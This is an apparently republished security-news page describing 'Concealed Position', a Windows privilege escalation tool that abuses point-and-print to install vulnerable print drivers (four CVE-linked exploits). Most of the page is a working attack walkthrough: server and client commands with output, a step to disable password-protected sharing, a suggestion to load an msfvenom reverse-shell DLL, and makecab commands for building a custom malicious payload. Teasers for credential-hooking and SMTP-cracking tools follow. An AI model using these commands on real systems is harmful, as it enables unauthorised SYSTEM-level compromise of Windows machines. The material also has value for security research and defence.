Security
Headlines
HeadlinesLatestCVEs

Headline

Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/s300/printer_hack.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="168" data-original-width="300" height="358" src="https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/w640-h358/printer_hack.jpeg" width="640" /></a></div><p><br /></p> <p>Concealed Position is a local <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="blank" title="privilege escalation">privilege escalation</a> attack against Windows using the concept of “Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the <em>as designed</em> package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with <a href="https://www.kitploit.com/search/label/Known%20Vulnerabilities” target="blank" title="known vulnerabilities">known vulnerabilities</a> which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.</p><span><a name=’more’></a></span><div><br /></div><span style="font-size: large;"><b>What exploits are available</b></span><br /> <p>Concealed Position offers four exploits - all with equally dumb names:</p> <ul> <li>ACIDDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-35449" rel="nofollow" target="blank" title="CVE-2021-35449">CVE-2021-35449</a> - Lexmark Universal Print Driver LPE</li> <li>RADIANTDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-38085" rel="nofollow" target="blank" title="CVE-2021-38085">CVE-2021-38085</a> - Canon TR150 Print Driver LPE</li> <li>POISONDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19363" rel="nofollow" target="blank" title="CVE-2019-19363">CVE-2019-19363</a> - Ricoh PCL6 Print Driver LPE</li> <li>SLASHINGDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1300" rel="nofollow" target="blank" title="CVE-2020-1300">CVE-2020-1300</a> - Windows Print Spooler LPE</li> </ul> <p>The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver’s certificate - something that is not(?) historically done.</p> <br /><span style="font-size: large;"><b>But which exploit should I use?!</b></span><br /> <p>Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere.</p> <br /><span style="font-size: large;"><b>How does it work?</b></span><br /> <p>Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="Step 1: Stage the driver in the driver store client to server: GetPrinterDriver server to client: Response with driver Stage 2: Install the driver from the driver store client: InstallPrinterDriverFromPackage Stage 3: Add a local printer (exploitation stage) client: Add printer “><pre><code>Step 1: Stage the driver in the driver store<br />client to server: GetPrinterDriver<br />server to client: Response with driver<br /><br />Stage 2: Install the driver from the driver store<br />client: InstallPrinterDriverFromPackage<br /><br />Stage 3: Add a local printer (exploitation stage)<br />client: Add printer<br /></code></pre></div> <p>It is important to note that SLASHINGDAMAGE doesn’t actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I’d leave the exploit in my evil server… as confusing as that may be.</p> <br /><span style="font-size: large;"><b>Is this a Windows vulnerability?</b></span><br /> <p>Arguably, yes. The driver store is a <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store” rel="nofollow" target="blank" title="trusted collection of … third-party driver packages">"trusted collection of … third-party driver packages"</a> that requires administrator access to modify. Using <code>GetPrinterDriver</code> a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.</p> <p>Microsoft seemed to agree when they issued <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481" rel="nofollow" target="blank" title="CVE-2021-34481">CVE-2021-34481</a>.</p> <p>Although… it’s arguable that this is simply a feature of the system and not a <a href="https://www.kitploit.com/search/label/Vulnerability" target="blank" title="vulnerability">vulnerability</a> at all. It really doesn’t matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.</p> <br /><span style="font-size: large;"><b>Which verions of Windows are affected by CVE-2021-34481?</b></span><br /> <p>At least Windows 8.1 and above.</p> <br /><span style="font-size: large;"><b>How do I use these tools?</b></span><br /> <p>Simple! So simple there will be many paragraphs to describe it!</p> <br /><b>CP Server</b><br /> <p>First, let’s look at cp_server’s command line options:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe _______ _______ __ _ _______ _______ _______ ___ _______ ______ | || || | | || || || _ || | | || | | || _ || || || || || || || | | || _ | | || | | || || || | | || | | | | | | | | || || || _ || || || || | | || || | | | | || | | || | | | | _ || || | | | |_______||_______||| |||_______||_______||| |||_______||_______||______| _______ _______ _______ ___ _______ ___ _______ __ _ | || || || | | || | | || | | | | _ || _ || _____|| | | || | | _ || || | | || || | | || |_____ | | | | | | | | | || | | || || ||_____ || | | | | | | || || _ | | | | | _____| || | | | | | | || | | | || |_______||_______||| || || |_______||| || server! CLI options: -h, --help Display the help message -e, --exploit arg The exploit to use -c, --cabs arg (=.\cab_files) The location of the cabinet files Exploits available: ACIDDAMAGE POISONDAMAGE RADIANTDAMAGE SLASHINGDAMAGE C:\Users\albinolobster\concealed_position\build\x64\Release\bin> "><pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe<br /> _______ _______ __ _ _______ _______ _______ ___ _______ ______<br />| || || | | || || || _ || | | || |<br />| || _ || || || || || || || | | || _ |<br />| || | | || || || | | || | | |_ | | | |<br />| || || || _ || || || || | | || || |<br />| | | || | | || | | |__ | _ || || |___ | |<br />|_______||_______||| |||_______||_______||| |||_______||_______||______|<br /> _______ _______ _______ ___ _______ ___ _______ __ <br />| || || || | | || | | || | | |<br />| _ || _ || _____|| | | || | | _ || || |<br />| || || | | || |_____ | | | | | | | | | || |<br />| || || || _____ || | | | | | | || || _ |<br />| | | | _____| || | | | | | | || | | |<br />|| |_______||_______||| || || |_______||| || server!<br /><br />CLI options:<br /> -h, --help Display the help message<br /> -e, --exploit arg The exploit to use<br /> -c, --cabs arg (=.\cab_files) The location of the cabinet files<br /><br />Exploits available:<br /> ACIDDAMAGE<br /> POISONDAMAGE<br /> RADIANTDAMAGE<br /> SLASHINGDAMAGE<br /><br />C:\Users\albinolobster\concealed_position\build\x64\Release\bin><br /></code></pre></div> <p>Above you can see the server requires two options:</p> <ol> <li>The exploit to configure the printer for</li> <li>A path to this repositories cab_files (.\cab_files\ is the default)</li> </ol> <p>For example, let’s say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE _______ _______ __ _ _______ _______ _______ ___ _______ ______ | || || | | || || || _ || | | || | | || _ || || || || || || || | | || _ | | || | | || || || | | || | | | | | | | | || || || _ || || || || | | || || | | | | || | | || | | |__ | _ || || |___ | | |_______||_______||| |||_______||_______||| |||_______||_______||______| _______ _______ _______ ___ _______ ___ _______ __ _ | || || || | | || | | || | | | | _ || _ || _____|| | | || | | _ || || | | || || | | || |_____ | | | | | | | | | || | | || || ||_____ || | | | | | | || || _ | | | | | _____| || | | | | | | || | | | || |_______||_______||| || || |_______||| || server! [+] Creating temporary space… [+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab [+] Pushing into the driver store [+] Cleaning up tmp space [+] Installing print driver [+] Driver installed! [+] Installing shared printer [+] Shared printer installed! [+] Automation Done. [!] IMPORTANT MANUAL STEPS! [0] In Advanced Sharing Settings, Turn off password protected sharing. [1] Ready to go! C:\Users\albinolobster\concealed_position\build\x64\Release\bin> "><pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE<br /> _______ _______ __ _ _______ _______ _______ ___ _______ ______<br />| || || | | || || || _ || | | || |<br />| || _ || || || || || || || | | || _ |<br />| || | | || || || | | || | | |_ | | | |<br />| || || || _ || || || || | | || || |<br />| | | || | | || | | |__ | _ || || |___ | |<br />|_______||_______||| |||_______||_______||| |||_______||_______||______|<br /> _______ _______ _______ ___ _______ ___ _______ __ <br />| || || || | | || | | || | | |<br />| _ || _ || _____|| | | || | | _ || || |<br />| || || | | || |_____ | | | | | | | | | || |<br />| || || ||_____ || | | | | | | || || _ |<br />| | | | _____| || | | | | | | || | | |<br />|| |_______||_______||| || || |_______||| || server!<br /><br />[+] Creating temporary space…<br />[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab<br />[+] Pushing into the driver store<br />[+] Cleaning up tmp space<br />[+] Installing print driver<br />[+] Driver installed!<br />[+] Installing shared printer<br />[+] Shared printer installed!<br />[+] Automation Done.<br />[!] IMPORTANT MANUAL STEPS!<br />[0] In Advanced Sharing Settings, Turn off password protected sharing.<br />[1] Ready to go!<br /><br />C:\Users\albinolobster\concealed_position\build\x64\Release\bin><br /></code></pre></div> <p>And that’s it, you’ll see a new printer on your system:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer Name ComputerName Type DriverName PortName Shared Publishe d ---- ------------ ---- ---------- -------- ------ -------- ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False OneNote for Windows 10 Local Microsoft Software Pri… Microsoft.Of… False False Microsoft XPS Document Writer Local Microsoft XPS Document… PORTPROMPT: False False Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False Fax Local Microsoft Shared Fax D… SHRFAX: False False PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> "><pre><code>PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer<br /><br />Name ComputerName Type DriverName PortName Shared Publishe<br /> d<br />---- ------------ ---- ---------- -------- ------ --------<br />ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False<br />CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False<br />OneNote for Windows 10 Local Microsoft Software Pri… Microsoft.Of… False False<br />Microsoft XPS Document Writer Local Microsoft XPS Document… PORTPROMPT: False False<br />Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False<br />Fax Local Microsoft Shared Fax D… SHRFAX: False False<br /><br /><br />PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin><br /></code></pre></div> <p>Note that there is one manual step that <code>cp_server</code> prompts you to do. Because I’m a junk hacker, I couldn’t figure out how to programmatically set the “Advanced Sharing Settings” -> “Turn off password protected sharing". You’ll have to do that yourself!</p> <p>The process for using <code>SLASHINGDAMAGE</code> is a little different. You’ll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and <em>then</em> you’ll still need to follow a couple of manual steps and reboot.</p> <br /><b>CP Client</b><br /> <p>The client is similarly easy to use. Let’s look at it’s command line options:</p> <div class="snippet-clipboard-content position-relative” data-snippet-clipboard-copy-content="C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe _______ _______ __ _ _______ _______ _______ ___ _______ ______ | || || | | || || || _ || | | || | | || _ || || || || || || || | | || _ | | || | | || || || | | || | | | | | | | | || || || _ || || || || | | || || | | | | || | | || | | |__ | _ || || |___ | | |_______||_______||| |||_______||_______||| |||_______||_______||______| _______ _______ _______ ___ _______ ___ _______ __ _ | || || || | | || | | || | | | | _ || _ || _____|| | | || | | _ || || | | || || | | || |_____ | | | | | | | | | || | | || || ||_____ || | | | | | | || || _ | | | | | _____| || | | | | | | || | | | || |_______||_______||| || || |_______||| || client! CLI options: -h, --help Display the help message -r, --rhost arg The remote evil printer address -n, --name arg The remote evil printer name -e, --exploit arg The exploit to use -l, --local No remote printer. Local attack only. -d, --dll arg Path to user provided DLL to execute. Exploits available: ACIDDAMAGE POISONDAMAGE RADIANTDAMAGE "><pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe<br /> _______ _______ __ _ _______ _______ _______ ___ _______ ______<br />| || || | | || || || _ || | | || |<br />| || _ || || || || || || || | | || _ |<br />| || | | || || || | | || | | |_ | | | |<br />| || || || _ || || || || | | || || |<br />| | | || | | || | | |__ | _ || || |___ | |<br />|_______||_______||| |||_______||_______||| |||_______||_______||______|<br /> _______ _______ _______ ___ _______ ___ _______ __ <br />| || || || | | || | | || | | |<br />| _ || _ || _____|| | | || | | _ || || |<br />| || || | | || |_____ | | | | | | | | | || |<br />| || || || _____ || | | | | | | || || _ |<br />| | | | _____| || | | | | | | || | | |<br />|| |_______||_______||| || || |_______||| || client!<br /><br />CLI options:<br /> -h, --help Display the help message<br /> -r, --rhost arg The remote evil printer address<br /> -n, --name arg The remote evil printer name<br /> -e, --exploit arg The exploit to use<br /> -l, --local No remote printer. Local attack only.<br /> -d, --dll arg Path to user provided DLL to execute.<br /><br />Exploits available:<br /> ACIDDAMAGE<br /> POISONDAMAGE<br /> RADIANTDAMAGE<br /></code></pre></div> <p>First, I’d like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we’ll just assume the embedded payload.</p> <p><code>cp_client</code> has two modes: remote and local. The remote option is the most interesting because it adds the <a href="https://www.kitploit.com/search/label/Vulnerable%20Driver" target="blank" title="vulnerable driver">vulnerable driver</a> to the driver store (thus executing the bring your own print driver vulnerability), so we’ll go with that first. Let’s say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:</p> <ol> <li>The exploit I want to use</li> <li>The evil printer IP address</li> <li>The name of the evil shared printer</li> </ol> <p>Like this!</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE _______ _______ __ _ _______ _______ _______ ___ _______ ______ | || || | | || || || _ || | | || | | || _ || || || || || || || | | || _ | | || | | || || || | | || | | | | | | | | || || || _ || || || || | | || || | | | | || | | || | | |_ | _ || || |___ | | |_______||_______||| |||_______||_______||| |||_______||_______||______| _______ _______ _______ ___ _______ ___ _______ __ _ | || || || | | || | | || | | | | _ || _ || _____|| | | || | | _ || || | | || || | | || |_____ | | | | | | | | | || | | || || ||_____ || | | | | | | || || _ | | | | | _____| || | | | | | | || | | | || |_______||_______||| || || |_______||| || client! [+] Checking if driver is already installed [-] Driver is not available. [+] Call back to evil printer @ \10.0.0.9\ACIDDAMAGE [+] Staging driver in driver store [+] Installing the staged driver [+] Driver installed! [+] Starting AcidDamage [+] Checking if C:\ProgramData\Lexmark Universal v2\ exists [-] Target directory doesn’t exist. Trigger install. [+] Installing printer [+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl [+] Searching file contents [+] Updating file contents [+] Dropping updated gpl [+] Dropping Dll.dll to disk [+] Staging dll in c:\tmp [+] Installing printer [!] Mucho success! "><pre><code>C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE<br />_______ _______ __ _ _______ _______ _______ ___ _______ ______<br />| || || | | || || || _ || | | || |<br />| || _ || || || || || || || | | || _ |<br />| || | | || || || | | || | | |_ | | | |<br />| || || || _ || || || || | | || || |<br />| | | || | | || | | |__ | _ || || |___ | |<br />|_______||_______||| |||_______||_______||| |||_______||_______||______|<br />_______ _______ _______ ___ _______ ___ _______ __ <br />| || || || | | || | | || | | |<br />| _ || _ || _____|| | | || | | _ || || |<br />| || || | | || |_____ | | | | | | | | | || |<br />| || | | ||_____ || | | | | | | || || _ |<br />| | | | _____| || | | | | | | || | | |<br />|| |_______||_______||| || || |_______||| || client!<br /><br />[+] Checking if driver is already installed<br />[-] Driver is not available.<br />[+] Call back to evil printer @ \10.0.0.9\ACIDDAMAGE<br />[+] Staging driver in driver store<br />[+] Installing the staged driver<br />[+] Driver installed!<br />[+] Starting AcidDamage<br />[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists<br />[-] Target directory doesn’t exist. Trigger install.<br />[+] Installing printer<br />[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl<br />[+] Searching file contents<br />[+] Updating file contents<br />[+] Dropping updated gpl<br />[+] Dropping Dll.dll to disk<br />[+] Staging dll in c:\tmp<br />[+] Installing printer<br />[!] Mucho success!<br /></code></pre></div> <p>That’s it! To execute a local only attack, you just need to provide the exploit:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE _______ _______ __ _ _______ _______ _______ ___ _______ ______ | || || | | || || || _ || | | || | | || _ || || || || || || || | | || _ | | || | | || || || | | || | | | | | | | | || || || _ || || || || | | || || | | | | || | | || | | |__ | _ || || |___ | | |_______||_______||| |||_______||_______||| |||_______||_______||______| _______ _______ _______ ___ _______ ___ _______ __ _ | || || || | | || | | || | | | | _ || _ || _____|| | | || | | _ || || | | || || | | || |_____ | | | | | | | | | || | | || || ||_____ || | | | | | | || || _ | | | | | _____| || | | | | | | || | | | || |_______||_______||| || || |_______||| || client! [+] Checking if driver is already installed [+] Driver installed! [+] Starting AcidDamage [+] Checking if C:\ProgramData\Lexmark Universal v2\ exists [-] Target directory doesn’t exist. Trigger install. [+] Installing printer [+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl [+] Searching file contents [+] Updating file contents [+] Dropping updated gpl [+] Dropping Dll.dll to disk [+] Staging dll in c:\tmp [+] Installing printer [!] Mucho success! C:\Users\albinolobster\concealed_position\build\x64\Release\bin> "><pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE<br />_______ _______ __ _ _______ _______ _______ ___ _______ ______<br />| || || | | || || || _ || | | || |<br />| || _ || || || || || || || | | || _ |<br />| || | | || || || | | || | | |_ | | | |<br />| || || || _ || || || || | | || || |<br />| | | || | | || | | |__ | _ || || |___ | |<br />|_______||_______||| |||_______||_______||| |||_______||_______||______|<br />_______ _______ _______ ___ _______ ___ _______ __ <br />| || || || | | || | | || | | |<br />| _ || _ || _____|| | | || | | _ || || |<br />| || || | | || |_____ | | | | | | | | | || |<br />| || || ||_____ || | | | | | | || || _ |<br />| | | | _____| || | | | | | | || | | |<br />|| |_______||_______||| || || |_______||| |__| client!<br /><br />[+] Checking if driver is already installed<br />[+] Driver installed!<br />[+] Starting AcidDamage<br />[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists<br />[-] Target directory doesn’t exist. Trigger install.<br />[+] Installing printer<br />[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl<br />[+] Searching file contents<br />[+] Updating file contents<br />[+] Dropping updated gpl<br />[+] Dropping Dll.dll to disk<br />[+] Staging dll in c:\tmp<br />[+] Installing printer<br />[!] Mucho success!<br /><br />C:\Users\albinolobster\concealed_position\build\x64\Release\bin><br /></code></pre></div> <br /><span style="font-size: large;"><b>Why doesn’t the client have a SLASHINGDAMAGE option?</b></span><br /> <p><code>SLASHINGDAMAGE</code> doesn’t need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that’s it! Unfortunately, if you want to roll a custom payload you’ll need to update the CAB in the cab_files directory. But that’s easy. Something like this:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="echo “evil.dll” “…/…/evil.dll” > files.txt makecab /f files.txt move disk1/1.cab exploit.cab “><pre><code>echo “evil.dll” “…/…/evil.dll” > files.txt<br />makecab /f files.txt<br />move disk1/1.cab exploit.cab<br /></code></pre></div> <p>It’s probably important to know that the version of <code>SLASHINGDAMAGE</code> in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.</p> <br /><span style="font-size: large;"><b>Pull Requests and Bugs</b></span><br /> <p>Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don’t provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I’ll close your issue without comment. I appreciate you, but I’m also pretty busy.</p> <br /><span style="font-size: large;"><b>Other things</b></span><br /> <p>One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you’ll need to manually update the C array as well (just use xxd to generate the array).</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download” href="https://github.com/jacob-baines/concealed_position" rel="nofollow" target="_blank" title="Download Concealed_Position">Download Concealed_Position</a></span></b></div>

kitploit
#Concealed Position#Concealed_Position#vulnerabilities#Vulnerability#Vulnerable#Vulnerable Driver#Windows#Windows 10

Related news

PoW-Shield - Project Dedicated To Fight DDoS And Spam With Proof Of Work, Featuring An Additional WA

<p><a href="http://2.bp.blogspot.com/-RfSp1Prm8Ns/YUOxaTgLFfI/AAAAAAAAvAE/SN4RCzdEi0Y5JMgSOfk7QtJ4oTb9HJ_hACK4BGAYYCw/s1600/PoW-Shield_7_screenshot-773941.jpeg" style="text-align: center;"><img alt="" border="0" height="290" id="BLOGGER_PHOTO_ID_7008640510588556786" src="http://2.bp.blogspot.com/-RfSp1Prm8Ns/YUOxaTgLFfI/AAAAAAAAvAE/SN4RCzdEi0Y5JMgSOfk7QtJ4oTb9HJ_hACK4BGAYYCw/w640-h290/PoW-Shield_7_screenshot-773941.jpeg" width="640" /></a></p><p><br /></p> <p>Project dedicated to provide DDoS <a href="https://www.kitploit.com/search/label/Protection" target="_blank" title="protection">protection</a> with proof-of-work</p><span><a name='more'></a></span><p style="text-align: center;"><br /></p><span style="font-size: large;"><b>Description</b></span><br /> <p>PoW Shield provides DDoS protection on OSI application layer by acting as a proxy that utilizes proof of work between the backend service and the end user. This project aims to provide an alternative to general captcha methods su...

JSPanda - Client-Side Prototype Pullution Vulnerability Scanner

<p style="text-align: center;"><a href="https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/s1099/jspanda_3_pollute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="844" data-original-width="1099" height="492" src="https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/w640-h492/jspanda_3_pollute.png" width="640" /></a></p><p style="text-align: center;"><br /></p> <p>JSpanda is client-side prototype pollution <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code.</p> <p>However, JSpanda cannot detect advanced prototype pollution vulnerabilities.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b><stron...

AES256_Passwd_Store - Secure Open-Source Password Manager

<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tGjIlM9LBZc/YUqO4Rh9sPI/AAAAAAAAvRs/bm1bfExG9XAPtJE5eSPbA7TGazin3GVsACNcBGAsYHQ/s741/secure_password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="357" data-original-width="741" height="308" src="https://1.bp.blogspot.com/-tGjIlM9LBZc/YUqO4Rh9sPI/AAAAAAAAvRs/bm1bfExG9XAPtJE5eSPbA7TGazin3GVsACNcBGAsYHQ/w640-h308/secure_password.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p> <p>This script securely encrypts or decrypts <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> on disk within a custom database file. It also features functionality to retrieve passwords from a previously generated database file. This script takes a master password from stdin/from memory, then <a href="https://www.kitploit.com/search/...

DirSearch - A Go Implementation Of Dirsearch

<p style="text-align: center;"><a href="http://1.bp.blogspot.com/-Eb1ngQXSYFs/YUOxfKGrtdI/AAAAAAAAvAM/kvv1AGXrZ64I7ehBqzTL1k0IlVJF16HWQCK4BGAYYCw/s1600/dirsearch_1_babygopher-badge-790842.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7008640593965069778" src="http://1.bp.blogspot.com/-Eb1ngQXSYFs/YUOxfKGrtdI/AAAAAAAAvAM/kvv1AGXrZ64I7ehBqzTL1k0IlVJF16HWQCK4BGAYYCw/s320/dirsearch_1_babygopher-badge-790842.png" /></a></p><br /> <p>This software is a Go implementation of the original <a href="https://github.com/maurosoria/dirsearch" rel="nofollow" target="_blank" title="dirsearch tool">dirsearch tool</a> written by <code>Mauro Soria</code>. DirSearch is the very first tool I write in Go, mostly to play and experiment with Go's concurrency model, channels, and so forth :)</p><p><span></span></p><a name='more'></a>&nbsp;<p></p><span style="font-size: large;"><b>Purpose</b></span><br /> <p>DirSearch takes an input URL ( <code>-url</code> parameter ) and a wordlist ( <code>-wordlist</cod...

PyHook - An Offensive API Hooking Tool Written In Python Designed To Catch Various Credentials Within The API Call

<p><a href="http://3.bp.blogspot.com/-w1TWIH0VmMU/YTVKoFtzVYI/AAAAAAAAt1U/Rc1XoXgIzw0KwG4SRi4foI0Aq9_Lm0x_wCK4BGAYYCw/s1600/PyHook_1_Demo-754513.gif" style="text-align: center;"><img alt="" border="0" height="328" id="BLOGGER_PHOTO_ID_7004586848034182530" src="http://3.bp.blogspot.com/-w1TWIH0VmMU/YTVKoFtzVYI/AAAAAAAAt1U/Rc1XoXgIzw0KwG4SRi4foI0Aq9_Lm0x_wCK4BGAYYCw/w640-h328/PyHook_1_Demo-754513.gif" width="640" /></a></p><br /> <p>PyHook is the python implementation of my <a href="https://github.com/IlanKalendarov/SharpHook" rel="nofollow" target="_blank" title="SharpHook">SharpHook</a> project, It uses various API hooks in order to give us the desired credentials.</p> <p>PyHook Uses <a href="https://www.kitploit.com/search/label/Frida" target="_blank" title="frida">frida</a> to inject it's dependencies into the target process</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Supported Processes</b></span><br /> <table> <tr> <th>Process</th> <th>A...

MailRipV2 - Improved SMTP Checker / SMTP Cracker With Proxy-Support, Inbox Test And Many More Features

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-TlTrewoCKCE/YUOfTfW4GvI/AAAAAAAAuwI/7AugxQAOxzIaT7YBQ-1D-MXde7jBohv4QCNcBGAsYHQ/s663/Mail.Rip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="575" data-original-width="663" height="556" src="https://1.bp.blogspot.com/-TlTrewoCKCE/YUOfTfW4GvI/AAAAAAAAuwI/7AugxQAOxzIaT7YBQ-1D-MXde7jBohv4QCNcBGAsYHQ/w640-h556/Mail.Rip.png" width="640" /></a></div><p><br /></p> <p> Your SMTP checker / SMTP cracker for mailpass combolists including features like: proxy-support (SOCKS4 / SOCKS5) with automatic proxy-scraper and checker, e-mail delivery / inbox check and DNS lookup for unknown SMTP-hosts. Made for easy usage and always working!</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Overview</b></span><br /> <br /><b>Legal Notices</b><br /> <p> <b>You are ONLY allowed to use the following ...

Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-h0VI37sR9_k/YUqNP3yhHHI/AAAAAAAAvRY/YEfOeO7sMlEHVNzTe5DeRVQ8dm0DnEf6ACNcBGAsYHQ/s1851/weakpass_1_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="939" data-original-width="1851" height="324" src="https://1.bp.blogspot.com/-h0VI37sR9_k/YUqNP3yhHHI/AAAAAAAAvRY/YEfOeO7sMlEHVNzTe5DeRVQ8dm0DnEf6ACNcBGAsYHQ/w640-h324/weakpass_1_sample.png" width="640" /></a></div><p><br /></p><p>The tool generates a <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> based on a set of words entered by the user.</p><span><a name='more'></a></span><p><br /></p><p>For example, during penetration testing, you need to gain access to some service, device, account, or Wi-Fi network that is password protected. For example, let it be the <em>Wi-Fi</em> network of <strong>EvilCorp</strong>. Sometimes, a passw...

CrowdSec - An Open-Source Massively Multiplayer Firewall Able To Analyze Visitor Behavior And Provide An Adapted Response To All Kinds Of Attacks

